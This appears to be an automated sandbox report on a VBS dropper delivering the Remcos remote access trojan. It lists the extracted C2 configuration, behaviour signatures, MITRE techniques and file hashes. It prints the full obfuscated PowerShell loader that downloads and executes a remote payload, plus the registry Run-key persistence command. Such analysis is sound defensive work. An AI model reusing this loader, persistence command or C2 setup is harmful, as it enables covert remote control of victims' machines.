remcos | 135db7b7e46ae0ffd43c59517be2f29a3d4700f45491bdf45bd16f374b7b3cf5

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
21/10/2024, 16:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ByDurieuxCerere021010024.vbs
Size

25KB
MD5

f0b294ee638bb4d395cd75451e71a6b6
SHA1

8bf584b1806091823b343cd6b49f369258a44d23
SHA256

a5eb3dd84918b7e65d9d2193775aeda26375c600c089dad2eecb9259c7b0dcc2
SHA512

a1c9bbadff52083f88316059598eee4d5d45902d1bf7ba85ce625451195e6721246a2f758b458fa960f24a2f3a0dbf6b7506adc5039f1b197536d3b83711e3cc
SSDEEP

384:XrCiFq74ZyPbHapGgkpLVjbUErWxljm7Gd8y:Xez74ZyPwXoV+xVm6d8y

Score

10^/10

remcos 520 discovery persistence rat

Malware Config

Extracted

Family

remcos

Botnet

520

renajazinw.duckdns.org:53848

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
Windeep.exe
copy_folder
AppDir
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-N1P6UN
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 64 IoCs

flow	pid	Process
3	4128	WScript.exe
10	3664	powershell.exe
32	2296	msiexec.exe
34	2296	msiexec.exe
36	2296	msiexec.exe
52	2296	msiexec.exe
55	2296	msiexec.exe
56	2296	msiexec.exe
57	2296	msiexec.exe
58	2296	msiexec.exe
59	2296	msiexec.exe
60	2296	msiexec.exe
61	2296	msiexec.exe
62	2296	msiexec.exe
63	2296	msiexec.exe
64	2296	msiexec.exe
65	2296	msiexec.exe
66	2296	msiexec.exe
67	2296	msiexec.exe
68	2296	msiexec.exe
69	2296	msiexec.exe
70	2296	msiexec.exe
71	2296	msiexec.exe
72	2296	msiexec.exe
74	2296	msiexec.exe
76	2296	msiexec.exe
77	2296	msiexec.exe
79	2296	msiexec.exe
80	2296	msiexec.exe
83	2296	msiexec.exe
85	2296	msiexec.exe
86	2296	msiexec.exe
87	2296	msiexec.exe
88	2296	msiexec.exe
89	2296	msiexec.exe
90	2296	msiexec.exe
91	2296	msiexec.exe
92	2296	msiexec.exe
93	2296	msiexec.exe
94	2296	msiexec.exe
95	2296	msiexec.exe
96	2296	msiexec.exe
97	2296	msiexec.exe
98	2296	msiexec.exe
102	2296	msiexec.exe
103	2296	msiexec.exe
108	2296	msiexec.exe
123	2296	msiexec.exe
124	2296	msiexec.exe
125	2296	msiexec.exe
126	2296	msiexec.exe
127	2296	msiexec.exe
128	2296	msiexec.exe
129	2296	msiexec.exe
130	2296	msiexec.exe
131	2296	msiexec.exe
132	2296	msiexec.exe
133	2296	msiexec.exe
134	2296	msiexec.exe
135	2296	msiexec.exe
136	2296	msiexec.exe
137	2296	msiexec.exe
138	2296	msiexec.exe
139	2296	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Leavy = "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\\Software\\Silently\\').lyspen;%Ankomststationen% ($Ridendes)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2296	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2368	powershell.exe
2296	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
372	ping.exe
3664	powershell.exe
2368	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1596	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
372	ping.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
3664	powershell.exe
3664	powershell.exe
2368	powershell.exe
2368	powershell.exe
2368	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2368	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3664	powershell.exe
Token: SeDebugPrivilege	2368	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2296	msiexec.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 4128 wrote to memory of 372	4128	WScript.exe	85
PID 4128 wrote to memory of 372	4128	WScript.exe	85
PID 4128 wrote to memory of 3664	4128	WScript.exe	88
PID 4128 wrote to memory of 3664	4128	WScript.exe	88
PID 2368 wrote to memory of 2296	2368	powershell.exe	101
PID 2368 wrote to memory of 2296	2368	powershell.exe	101
PID 2368 wrote to memory of 2296	2368	powershell.exe	101
PID 2368 wrote to memory of 2296	2368	powershell.exe	101
PID 2296 wrote to memory of 4128	2296	msiexec.exe	102
PID 2296 wrote to memory of 4128	2296	msiexec.exe	102
PID 2296 wrote to memory of 4128	2296	msiexec.exe	102
PID 4128 wrote to memory of 1596	4128	cmd.exe	104
PID 4128 wrote to memory of 1596	4128	cmd.exe	104
PID 4128 wrote to memory of 1596	4128	cmd.exe	104

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ByDurieuxCerere021010024.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4128
- C:\Windows\System32\ping.exe
  ping gormezl_6777.6777.6777.677e
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk ca kRegeeDevirDocunBacoe StasVe d]disc=Kass$UnomSHavot O,fvCo,nkiso nJen aF,rrp KvspDayte PhynDisc ');$Deprecierendes=Nrigstes 'rode$Ch lOG rdvArmleDygtrDir hA.buaFotoeFru.nVaflgEdgitMods.PrimDSemioO muwBisknAffel SinoChroarus.d S oFSdariTupalKi geinfi( ppl$Br.cH etu GabcSev k Epis Efft gnoeBagarAlvoa orgNonaeNytt, ec$ ,onNSmykoSig nEy,bi O tlParalSat.uExotsGeheiDrkov NedeGala5Patr5Cimm) ig ';$Nonillusive55=$Verdsligsindet;Depending (Nrigstes 'Tr c$SyngGdoorlSkmmo B lBBronAConiLUphe:Re ipKoglIp lyvBestOfremtThu,ADis.lKlubL AdgYVel =Atom(g.amTfo eeEgepS HunTRefl-AnthPr.deARepatHimmH T,a Inta$AldrnTokso .rinCen,IAndeL yselSub UMunisSteviIndkV UlvEF re5frim5Ge,d)U,st ');while (!$Pivotally) {Depending (Nrigstes ' Hel$Misrg Ry.lCataoDistb CamaRefelGros:JobbNDebaaPlantSuppiPa ev Sane pla= res$ SuztS oarPhysuSt geAf.e ') ;Depending $Deprecierendes;Depending (Nrigstes ' NunsTilsTLactaViviR WritArbi-BerbsOxytLU ateka aeSta.pThai Skov4Teno ');Depending (Nrigstes 'Poli$ LaugRedeLTapio R dB Tjeap nsLPr.p:Bussp pisiFutivEp soCy.ttAntoaSk,mLDia.lG ldyTe e=arbe( ,rutPr.fELostS Sn tMuti-orolpBe oAMar.TOpvoh Gra Oppu$InswN OrdOIm.rn.rerIGaddLF asl.idduUtilsStroIElekvincie Par5Amat5 Dou)Tigl ') ;Depending (Nrigstes 'Pati$GaffgL haLD adoBelab PsyA aslThom:AsprmInexaEdder Tamk V sEoutwdGallSLyknp Outl TaeAo ttD An SAvere NetRMungnS,xieTr.cSBeec=I,tr$V zlg GrsLFgteONavlBB usAArkolimp :Mopsk GunlStopL ignIWandN,swagTot SDipn+Impo+Drik% rv$ KnolMiryiL,ttMBookIVowmT SpaAdeenl S,a. riCUnvaokil u WitN u eTKons ') ;$Hucksterage=$Limital[$Markedspladsernes];}$torteret=334742;$Nykalket=29680;Depending (Nrigstes ' s x$.liegBilll HiloDri Bparaa MjdlHolm:PindS Clut DafO,rneK ChuEdjrvrLokaFDr ayFrs R ForE BesNPeriECon.SBer Disa=Capr angContEV.nlTSalp-RigscSn,dO dslN TilTTat,eHackn eratOroc Nav $KonkNAlycOL.san akiIStiglB,aaLFeriUCuinsKwa IFyldvToriEScre5Stro5Leve ');Depending (Nrigstes ' Rot$ UnigLivvlLi so Holb MapaAparl num: S,rS Pactc ckoDirkgH ndyGeno Swee=Oper Vale[ReflS lisyFalss istAfste laumEff .T ldC FlloVa enKa.ivManiediharPlett H o]lign:Omis:buskF Gstr Nuco P lm,oliBkiosa .vrsSklme S v6Trkn4ChutSForutpioxr AphiTilsn TelgPens(Inde$AphaSNeurtVomtoimplkDo seSpegrUdbofRepay Indr PreeFlabnFor.eBr,gs opu)Stev ');Depending (Nrigstes 'Afma$ vlnGSorelcle O Ar,BMyttALevelQuon:stenmMarga nmoT omme .irrInt,INon AHy nlafstiVa sSAntiMyrkesUnde8.lai0Luk A no=Urin Tali[ReflsStruyHydrsNysgtRegnEPlsemhead.TydeTBebaEAutoXPa.kt Ken.S,mmEComonDanscUncaOOpraD StoiCro nS miGDish] F r:Tids:EmbiaIn eSspircpr fiD cuiAnti.TactgBo.oe akvTChins rit TokRQu ri FjenRegigPrec(Thri$Hy.rSCh nt Si,OBr dG T myKrse) Wal ');Depending (Nrigstes 'Blaa$ BengSaphlOmniO UngB eriaMilllRegd:OtocPRandlDagga Blos ilsTatlaICuscd R moL pamUnt eMikr=Meld$E,ucm.ncaADepuTUd.bENykbRUdleITsara Smrl,ekoiR tms JanMKaadsB ed8Prot0Meiz.StilsDrosUT neb .risfaltTL njrAfriI fg nOut gDeg ( Byg$FjertSpi OPub RSuccTkorrESankRSeroeLiquTSta ,Saf $ CosN,adeYkmpekW,isASt vLSprnkNaziEF.stt Enc)c rs ');Depending $Plastidome;"
  2⤵
  - Blocklisted process makes network request
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3664

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk ca kRegeeDevirDocunBacoe StasVe d]disc=Kass$UnomSHavot O,fvCo,nkiso nJen aF,rrp KvspDayte PhynDisc ');$Deprecierendes=Nrigstes 'rode$Ch lOG rdvArmleDygtrDir hA.buaFotoeFru.nVaflgEdgitMods.PrimDSemioO muwBisknAffel SinoChroarus.d S oFSdariTupalKi geinfi( ppl$Br.cH etu GabcSev k Epis Efft gnoeBagarAlvoa orgNonaeNytt, ec$ ,onNSmykoSig nEy,bi O tlParalSat.uExotsGeheiDrkov NedeGala5Patr5Cimm) ig ';$Nonillusive55=$Verdsligsindet;Depending (Nrigstes 'Tr c$SyngGdoorlSkmmo B lBBronAConiLUphe:Re ipKoglIp lyvBestOfremtThu,ADis.lKlubL AdgYVel =Atom(g.amTfo eeEgepS HunTRefl-AnthPr.deARepatHimmH T,a Inta$AldrnTokso .rinCen,IAndeL yselSub UMunisSteviIndkV UlvEF re5frim5Ge,d)U,st ');while (!$Pivotally) {Depending (Nrigstes ' Hel$Misrg Ry.lCataoDistb CamaRefelGros:JobbNDebaaPlantSuppiPa ev Sane pla= res$ SuztS oarPhysuSt geAf.e ') ;Depending $Deprecierendes;Depending (Nrigstes ' NunsTilsTLactaViviR WritArbi-BerbsOxytLU ateka aeSta.pThai Skov4Teno ');Depending (Nrigstes 'Poli$ LaugRedeLTapio R dB Tjeap nsLPr.p:Bussp pisiFutivEp soCy.ttAntoaSk,mLDia.lG ldyTe e=arbe( ,rutPr.fELostS Sn tMuti-orolpBe oAMar.TOpvoh Gra Oppu$InswN OrdOIm.rn.rerIGaddLF asl.idduUtilsStroIElekvincie Par5Amat5 Dou)Tigl ') ;Depending (Nrigstes 'Pati$GaffgL haLD adoBelab PsyA aslThom:AsprmInexaEdder Tamk V sEoutwdGallSLyknp Outl TaeAo ttD An SAvere NetRMungnS,xieTr.cSBeec=I,tr$V zlg GrsLFgteONavlBB usAArkolimp :Mopsk GunlStopL ignIWandN,swagTot SDipn+Impo+Drik% rv$ KnolMiryiL,ttMBookIVowmT SpaAdeenl S,a. riCUnvaokil u WitN u eTKons ') ;$Hucksterage=$Limital[$Markedspladsernes];}$torteret=334742;$Nykalket=29680;Depending (Nrigstes ' s x$.liegBilll HiloDri Bparaa MjdlHolm:PindS Clut DafO,rneK ChuEdjrvrLokaFDr ayFrs R ForE BesNPeriECon.SBer Disa=Capr angContEV.nlTSalp-RigscSn,dO dslN TilTTat,eHackn eratOroc Nav $KonkNAlycOL.san akiIStiglB,aaLFeriUCuinsKwa IFyldvToriEScre5Stro5Leve ');Depending (Nrigstes ' Rot$ UnigLivvlLi so Holb MapaAparl num: S,rS Pactc ckoDirkgH ndyGeno Swee=Oper Vale[ReflS lisyFalss istAfste laumEff .T ldC FlloVa enKa.ivManiediharPlett H o]lign:Omis:buskF Gstr Nuco P lm,oliBkiosa .vrsSklme S v6Trkn4ChutSForutpioxr AphiTilsn TelgPens(Inde$AphaSNeurtVomtoimplkDo seSpegrUdbofRepay Indr PreeFlabnFor.eBr,gs opu)Stev ');Depending (Nrigstes 'Afma$ vlnGSorelcle O Ar,BMyttALevelQuon:stenmMarga nmoT omme .irrInt,INon AHy nlafstiVa sSAntiMyrkesUnde8.lai0Luk A no=Urin Tali[ReflsStruyHydrsNysgtRegnEPlsemhead.TydeTBebaEAutoXPa.kt Ken.S,mmEComonDanscUncaOOpraD StoiCro nS miGDish] F r:Tids:EmbiaIn eSspircpr fiD cuiAnti.TactgBo.oe akvTChins rit TokRQu ri FjenRegigPrec(Thri$Hy.rSCh nt Si,OBr dG T myKrse) Wal ');Depending (Nrigstes 'Blaa$ BengSaphlOmniO UngB eriaMilllRegd:OtocPRandlDagga Blos ilsTatlaICuscd R moL pamUnt eMikr=Meld$E,ucm.ncaADepuTUd.bENykbRUdleITsara Smrl,ekoiR tms JanMKaadsB ed8Prot0Meiz.StilsDrosUT neb .risfaltTL njrAfriI fg nOut gDeg ( Byg$FjertSpi OPub RSuccTkorrESankRSeroeLiquTSta ,Saf $ CosN,adeYkmpekW,isASt vLSprnkNaziEF.stt Enc)c rs ');Depending $Plastidome;"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2296
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4128
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:1596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
6dd3a8f577917ae8fd17aa03f6bdff9b

SHA1
71483dbaeaf886194f2639d7e285802933e7c43d

SHA256
d9e987c11d70b4f058ac58fe67d7ce3fa62df1202b15a710b1e15c8b4de59f6a

SHA512
4962b79111287175af19c984e413c0667a0a5950a04f453aac62f9bd0e4249fc4f337c3387271f860d9671e352562343bfdd9805c87d8e9827b050078c1bc696

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d4ff23c124ae23955d34ae2a7306099a

SHA1
b814e3331a09a27acfcd114d0c8fcb07957940a3

SHA256
1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

SHA512
f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_arkftzwy.r4f.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Cobblerism.Ace

Filesize
474KB

MD5
b768ffe40278cfdcec1748d9634f545c

SHA1
4f6acf81a2218b6ab1d99a1cf63a0585dd53e5f3

SHA256
c987d9aeb5b30da5425652761e91102fdbbb9523e58920a4f4a16204a167b67a

SHA512
2f4f6f8f99441fbaffa862254c20066f0680a5329f037e2507f24dce8f6bd09360eca0e55f78fc0dc88733a01a4d49576108e41bfa112e4229ab8c8080f25444

Download Submit
memory/2296-74-0x0000000000840000-0x0000000001A94000-memory.dmp

Filesize
18.3MB

Download
memory/2296-83-0x0000000000840000-0x0000000001A94000-memory.dmp

Filesize
18.3MB

Download
memory/2296-80-0x0000000000840000-0x0000000001A94000-memory.dmp

Filesize
18.3MB

Download
memory/2296-77-0x0000000000840000-0x0000000001A94000-memory.dmp

Filesize
18.3MB

Download
memory/2296-86-0x0000000000840000-0x0000000001A94000-memory.dmp

Filesize
18.3MB

Download
memory/2296-71-0x0000000000840000-0x0000000001A94000-memory.dmp

Filesize
18.3MB

Download
memory/2296-68-0x0000000000840000-0x0000000001A94000-memory.dmp

Filesize
18.3MB

Download
memory/2296-89-0x0000000000840000-0x0000000001A94000-memory.dmp

Filesize
18.3MB

Download
memory/2296-65-0x0000000000840000-0x0000000001A94000-memory.dmp

Filesize
18.3MB

Download
memory/2296-62-0x0000000000840000-0x0000000001A94000-memory.dmp

Filesize
18.3MB

Download
memory/2296-92-0x0000000000840000-0x0000000001A94000-memory.dmp

Filesize
18.3MB

Download
memory/2296-59-0x0000000000840000-0x0000000001A94000-memory.dmp

Filesize
18.3MB

Download
memory/2296-55-0x0000000000840000-0x0000000001A94000-memory.dmp

Filesize
18.3MB

Download
memory/2368-25-0x0000000005590000-0x0000000005BB8000-memory.dmp

Filesize
6.2MB

Download
memory/2368-27-0x00000000054B0000-0x0000000005516000-memory.dmp

Filesize
408KB

Download
memory/2368-44-0x0000000007550000-0x00000000075E6000-memory.dmp

Filesize
600KB

Download
memory/2368-45-0x00000000074F0000-0x0000000007512000-memory.dmp

Filesize
136KB

Download
memory/2368-46-0x0000000008760000-0x0000000008D04000-memory.dmp

Filesize
5.6MB

Download
memory/2368-42-0x0000000007B30000-0x00000000081AA000-memory.dmp

Filesize
6.5MB

Download
memory/2368-48-0x0000000008D10000-0x000000000CA2A000-memory.dmp

Filesize
61.1MB

Download
